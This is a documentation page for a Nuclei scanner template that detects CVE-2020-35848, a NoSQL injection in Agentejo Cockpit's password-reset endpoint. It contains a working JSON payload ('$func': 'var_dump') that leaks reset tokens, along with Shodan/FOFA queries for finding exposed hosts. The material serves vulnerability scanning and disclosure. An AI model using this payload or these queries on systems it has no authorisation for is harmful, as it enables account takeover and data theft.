Agentejo Cockpit <0.12.0 - NoSQL Injection
ID: CVE-2020-35848
Severity: critical
Author: dwisiswant0
Tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo
Description
Section titled “Description”Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.
YAML Source
Section titled “YAML Source”id: CVE-2020-35848
info: name: Agentejo Cockpit <0.12.0 - NoSQL Injection author: dwisiswant0 severity: critical description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form. impact: | Successful exploitation of this vulnerability could allow an attacker to manipulate database queries, potentially leading to unauthorized access, data leakage, or data corruption. remediation: | Upgrade Agentejo Cockpit to version 0.12.0 or later to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/rce-cockpit-cms/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35848 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35848 cwe-id: CWE-89 epss-score: 0.80133 epss-percentile: 0.98306 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: agentejo product: cockpit shodan-query: - http.favicon.hash:688609340 - http.html:"cockpit" fofa-query: - icon_hash=688609340 - body="cockpit" tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo
http: - method: POST path: - "{{BaseURL}}/auth/newpassword"
body: | { "token": { "$func": "var_dump" } }
headers: Content-Type: application/json matchers: - type: regex part: body regex: - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"'# digest: 4a0a00473045022100a99e3421a3c171a5fb151ea35188ea0f8cb2c452195041dda20a91565ffd551102203d076614967c752a93ecc18d15c9a1e7c20b2042ba2aa14dcac60e03da43d680:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-35848.yaml"